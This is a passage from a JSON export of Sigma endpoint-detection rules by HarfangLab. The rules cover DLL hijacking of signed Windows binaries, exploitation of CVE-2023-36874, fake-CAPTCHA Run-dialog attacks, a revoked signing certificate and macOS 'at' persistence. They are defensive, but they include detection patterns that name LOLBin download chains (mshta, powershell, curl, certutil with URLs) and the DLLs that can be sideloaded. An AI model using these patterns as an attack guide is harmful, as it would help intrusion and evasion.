+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.591044Z",
+ "creation_date": "2026-03-23T11:45:34.591047Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.591055Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
+ "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
+ "https://attack.mitre.org/techniques/T1574/001/"
+ ],
+ "name": "t1574_001_dll_hijacking_mdsched.yml",
+ "content": "title: DLL Hijacking via mdsched.exe\nid: 0a708087-9ef8-4db8-b5a9-84d30391d776\ndescription: |\n Detects potential Windows DLL Hijacking via mdsched.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'mdsched.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\bcd.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "0a708087-9ef8-4db8-b5a9-84d30391d776",
+ "rule_name": "DLL Hijacking via mdsched.exe",
+ "rule_description": "Detects potential Windows DLL Hijacking via mdsched.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
+ "rule_creation_date": "2021-12-10",
+ "rule_modified_date": "2025-07-11",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1574.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "0a956b02-3359-4969-9418-cfa7e8279f9e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.609800Z",
+ "creation_date": "2026-03-23T11:45:34.609803Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.609811Z",
+ "rule_level": "critical",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/",
+ "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36874",
+ "https://attack.mitre.org/techniques/T1068/"
+ ],
+ "name": "t1068_wer_service_vulnerability.yml",
+ "content": "title: WER Service CVE-2023-36874 Vulnerability Exploited\nid: 0a956b02-3359-4969-9418-cfa7e8279f9e\ndescription: |\n Detects exploitation of CVE-2023-36874 a vulnerability affecting the Windows Error Reporting (WER) component.\n Microsoft Windows Error Reporting Service contains a vulnerability that allows a local user, without administrator privileges, to escalate as SYSTEM.\n It is recommended to investigate if the exploitation was successful by looking at integrity level of the process that triggered the alert.\nreferences:\n - https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/\n - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36874\n - https://attack.mitre.org/techniques/T1068/\ndate: 2023/08/24\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1068\n - cve.2023-36874\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Exploit.CVE-2023-36874\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\wermgr.exe'\n # C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s wercplsupport\n ParentImage: '?:\\Windows\\System32\\svchost.exe'\n ParentCommandLine|contains: 'wercplsupport'\n\n filter_signed:\n OriginalFileName: 'WerMgr'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_*\nlevel: critical\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "0a956b02-3359-4969-9418-cfa7e8279f9e",
+ "rule_name": "WER Service CVE-2023-36874 Vulnerability Exploited",
+ "rule_description": "Detects exploitation of CVE-2023-36874 a vulnerability affecting the Windows Error Reporting (WER) component.\nMicrosoft Windows Error Reporting Service contains a vulnerability that allows a local user, without administrator privileges, to escalate as SYSTEM.\nIt is recommended to investigate if the exploitation was successful by looking at integrity level of the process that triggered the alert.\n",
+ "rule_creation_date": "2023-08-24",
+ "rule_modified_date": "2025-04-15",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1068"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "0a95ac1e-214e-4581-b19e-5ba1e9731861",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.088105Z",
+ "creation_date": "2026-03-23T11:45:34.088107Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.088111Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware",
+ "https://attack.mitre.org/techniques/T1553/002/"
+ ],
+ "name": "t1553_002_dicol_effluent_revoked_certificate.yml",
+ "content": "title: Process Executed Signed with Revoked Certificate\nid: 0a95ac1e-214e-4581-b19e-5ba1e9731861\ndescription: |\n Detects the execution of a process signed using a DICOL EFFLUENT revoked certificates.\n Malicious usage of this certificate has already been seen by the threat actor UNC2596.\n It is recommended to terminate processes signed with revoked DICOL EFFLUENT certificates and isolate affected systems.\nreferences:\n - https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware\n - https://attack.mitre.org/techniques/T1553/002/\ndate: 2022/09/27\nmodified: 2025/01/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.StolenCertificate\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ProcessSignatureSignerThumbprint: '3e22bfc34b0718ee1416cc5bf1f7b2b646f5b56a'\n\n condition: selection\nlevel: high\nconfidence: strong",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "0a95ac1e-214e-4581-b19e-5ba1e9731861",
+ "rule_name": "Process Executed Signed with Revoked Certificate",
+ "rule_description": "Detects the execution of a process signed using a DICOL EFFLUENT revoked certificates.\nMalicious usage of this certificate has already been seen by the threat actor UNC2596.\nIt is recommended to terminate processes signed with revoked DICOL EFFLUENT certificates and isolate affected systems.\n",
+ "rule_creation_date": "2022-09-27",
+ "rule_modified_date": "2025-01-14",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion"
+ ],
+ "rule_technique_tags": [
+ "attack.t1553.002"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "0ab5a1ee-2e2d-40e4-874a-d5e2f3b74aee",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.623495Z",
+ "creation_date": "2026-03-23T11:45:34.623497Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.623501Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://blog.qualys.com/vulnerabilities-threat-research/2024/10/20/unmasking-lumma-stealer-analyzing-deceptive-tactics-with-fake-captcha",
+ "https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/behind-the-captcha-a-clever-gateway-of-malware/",
+ "https://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/",
+ "https://attack.mitre.org/techniques/T1566/",
+ "https://attack.mitre.org/techniques/T1204/004/"
+ ],
+ "name": "t1204_001_run_command_explorer.yml",
+ "content": "title: Suspicious Process Executed via Run Prompt\nid: 0ab5a1ee-2e2d-40e4-874a-d5e2f3b74aee\ndescription: |\n Detects suspicious programs executed via the Windows Run dialog (Win+R) that are initiated after users interact with fake CAPTCHA verification prompts.\n In this attack vector, users are presented with a fake CAPTCHA verification page displaying an \"I'm not a robot\" checkbox. After clicking the checkbox, users are instructed to execute specific commands via the Windows Run dialog (Win+R). Attackers exploit user trust in familiar verification systems to trick them into manually executing malicious commands, which are usually related to LummaStealer.\n It is recommended to investigate the entire process chain following any suspicious Run dialog executions.\nreferences:\n - https://blog.qualys.com/vulnerabilities-threat-research/2024/10/20/unmasking-lumma-stealer-analyzing-deceptive-tactics-with-fake-captcha\n - https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/\n - https://www.mcafee.com/blogs/other-blogs/mcafee-labs/behind-the-captcha-a-clever-gateway-of-malware/\n - https://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/\n - https://attack.mitre.org/techniques/T1566/\n - https://attack.mitre.org/techniques/T1204/004/\ndate: 2024/11/12\nmodified: 2026/01/30\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1566\n - attack.execution\n - attack.t1204.004\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Phishing\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n StackTrace|re: '(?i).*\\|.:\\\\Windows\\\\System32\\\\user32\\.dll!SendMessageW\\+0x[a-f0-9]*$'\n StackTrace|contains:\n - 'CallWindowProcW'\n - 'DispatchMessageW'\n ParentImage|endswith: '\\explorer.exe'\n Image|startswith: '?:\\windows\\'\n # Ensure commandline containes at least a space -> there are some args\n CommandLine|contains: ' '\n\n selection_image:\n - Image:\n - '?:\\Windows\\hh.exe'\n - '?:\\Windows\\System32\\mshta.exe'\n - '?:\\Windows\\SysWOW64\\mshta.exe'\n - '?:\\Windows\\System32\\PresentationHost.exe'\n - '?:\\Windows\\SysWOW64\\PresentationHost.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n - '?:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe'\n - Image:\n - '?:\\Windows\\System32\\msiexec.exe'\n - '?:\\Windows\\SysWOW64\\msiexec.exe'\n - '?:\\windows\\system32\\regsvr32.exe'\n - '?:\\windows\\SysWOW64\\regsvr32.exe'\n - '?:\\windows\\system32\\rundll32.exe'\n - '?:\\windows\\SysWOW64\\rundll32.exe'\n CommandLine|contains: 'http'\n\n selection_cmd:\n Image:\n - '?:\\Windows\\System32\\cmd.exe'\n - '?:\\Windows\\SysWOW64\\cmd.exe'\n CommandLine|contains:\n - 'mshta'\n - 'PresentationHost'\n - 'powershell'\n - 'msiexec'\n - 'regsvr32'\n - 'rundll32'\n - 'curl'\n - 'certutil'\n\n filter_lnk:\n LnkPath|contains: '?'\n\n exclusion_powershell:\n CommandLine:\n - '?:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe -noprofile'\n - '?:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe -ExecutionPolicy Bypass'\n - '?:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe -ExecutionPolicy Bypass -NoLogo -NoProfile'\n - '?:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe -Command Start-Process PowerShell -Verb RunAs'\n - '?:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe -ExecutionPolicy Bypass -File ?:\\\\*\\Scripts\\\\*.ps1'\n - '?:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe -Command Start-Process notepad.exe *'\n\n exclusion_msiexec:\n CommandLine|startswith: '?:\\Windows\\system32\\msiexec.exe /* \\\\\\\\*.local\\'\n\n condition: selection and 1 of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "0ab5a1ee-2e2d-40e4-874a-d5e2f3b74aee",
+ "rule_name": "Suspicious Process Executed via Run Prompt",
+ "rule_description": "Detects suspicious programs executed via the Windows Run dialog (Win+R) that are initiated after users interact with fake CAPTCHA verification prompts.\nIn this attack vector, users are presented with a fake CAPTCHA verification page displaying an \"I'm not a robot\" checkbox. After clicking the checkbox, users are instructed to execute specific commands via the Windows Run dialog (Win+R). Attackers exploit user trust in familiar verification systems to trick them into manually executing malicious commands, which are usually related to LummaStealer.\nIt is recommended to investigate the entire process chain following any suspicious Run dialog executions.\n",
+ "rule_creation_date": "2024-11-12",
+ "rule_modified_date": "2026-01-30",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.execution",
+ "attack.initial_access"
+ ],
+ "rule_technique_tags": [
+ "attack.t1204.004",
+ "attack.t1566"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "0ab5a1ee-2e2d-40e4-874a-d5e2f3b74fc5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.093337Z",
+ "creation_date": "2026-03-23T11:45:34.093339Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.093343Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://attack.mitre.org/techniques/T1053/002/"
+ ],
+ "name": "t1053_002_at_scheduler_enabled.yml",
+ "content": "title: At Jobs Enabled via Launchd\nid: 0ab5a1ee-2e2d-40e4-874a-d5e2f3b74fc5\ndescription: |\n Detects the loading of file related to the `at` utility by launchd.\n Adversaries may use at to execute programs at system startup or on a scheduled basis for persistence.\n It is recommended to check the content of the /var/at/jobs folder for suspicious jobs.\nreferences:\n - https://attack.mitre.org/techniques/T1053/002/\ndate: 2024/05/10\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1053.002\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Persistence\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n Image|endswith: '/launchctl'\n CommandLine|contains|all:\n - 'load'\n - '/com.apple.atrun.plist'\n\n condition: selection\nlevel: high\nconfidence: strong",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "0ab5a1ee-2e2d-40e4-874a-d5e2f3b74fc5",
+ "rule_name": "At Jobs Enabled via Launchd",
+ "rule_description": "Detects the loading of file related to the `at` utility by launchd.\nAdversaries may use at to execute programs at system startup or on a scheduled basis for persistence.\nIt is recommended to check the content of the /var/at/jobs folder for suspicious jobs.\n",
+ "rule_creation_date": "2024-05-10",
+ "rule_modified_date": "2025-01-28",
+ "rule_os": "macos",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.persistence"
+ ],
+ "rule_technique_tags": [
+ "attack.t1053.002"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "0ac5fafe-dc2c-42bf-9d26-3882b0df7857",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.599572Z",
+ "creation_date": "2026-03-23T11:45:34.599576Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.599583Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://securityintelligence.com/posts/windows-features-dll-sideloading/",
+ "https://github.com/xforcered/WFH",
+ "https://wietze.github.io/blog/save-the-environment-variables",
+ "https://attack.mitre.org/techniques/T1574/001/"
+ ],
+ "name": "t1574_001_dll_hijacking_cidiag.yml",
+ "content": "title: DLL Hijacking via CIDiag.exe\nid: 0ac5fafe-dc2c-42bf-9d26-3882b0df7857\ndescription: |\n Detects potential Windows DLL Hijacking via CIDiag.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'CIDiag.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\wevtapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "0ac5fafe-dc2c-42bf-9d26-3882b0df7857",
+ "rule_name": "DLL Hijacking via CIDiag.exe",
+ "rule_description": "Detects potential Windows DLL Hijacking via CIDiag.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
+ "rule_creation_date": "2022-09-15",
+ "rule_modified_date": "2025-07-11",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1574.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "0ad1a87e-1efd-47a3-a74b-3ec148f9992a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.618712Z",
+ "creation_date": "2026-03-23T11:45:34.618714Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.618718Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
+ "https://github.com/xforcered/WFH",
+ "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
+ "https://attack.mitre.org/techniques/T1574/001/"
+ ],
+ "name": "t1574_001_dll_hijacking_workfolders.yml",
+ "content": "title: DLL Hijacking via workfolders.exe\nid: 0ad1a87e-1efd-47a3-a74b-3ec148f9992a\ndescription: |\n Detects potential Windows DLL Hijacking via workfolders.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'workfolders.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CLDAPI.dll'\n - '\\CRYPTBASE.DLL'\n - '\\davclnt.dll'\n - '\\DEVOBJ.dll'\n - '\\dmEnrollEngine.DLL'\n - '\\drprov.dll'\n - '\\edputil.dll'\n - '\\FLTLIB.DLL'\n - '\\ntlanman.dll'\n - '\\p9np.dll'\n - '\\policymanager.dll'\n - '\\PROPSYS.dll'\n - '\\USERENV.dll'\n - '\\windows.storage.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "0ad1a87e-1efd-47a3-a74b-3ec148f9992a",
+ "rule_name": "DLL Hijacking via workfolders.exe",
+ "rule_description": "Detects potential Windows DLL Hijacking via workfolders.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
+ "rule_creation_date": "2021-12-10",
+ "rule_modified_date": "2025-07-11",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1574.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "0ae4376f-360f-4b97-9b3f-4c735a82fbf6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "medium",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
